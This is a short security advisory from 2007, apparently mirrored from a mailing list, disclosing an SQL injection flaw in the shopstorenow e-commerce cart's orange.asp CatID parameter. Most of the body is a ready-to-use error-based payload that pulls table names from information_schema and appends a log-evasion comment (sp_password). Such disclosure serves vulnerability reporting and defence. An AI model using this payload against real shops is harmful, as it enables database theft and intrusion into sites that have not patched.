Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY LINKS NEWS MAN DOCUMENTATION

<< Previous INDEX Search src / Print Next >>

Date: 6 Jan 2007 17:19:37 -0000
From: [email protected]
To: [email protected]
Subject: shopstorenow (orange.asp) sql injection
X-Virus-Scanned: antivirus-gw at tyumen.ru

============================= HItamputih Crew ====================
#hitamputih Advisory
##Discovered By : IbnuSina
#-----------------------------------------------------------
#Software: shopstorenow E-commerce Shopping Cart
#Method: SQL Injection
#
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//orange.asp?CatID=[SQL]

ex:

http://[target]/[path]//orange.asp?CatID=1'%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))--sp_password

#########################################################################################

<< Previous INDEX Search src / Print Next >>

Партнёры:

Хостинг: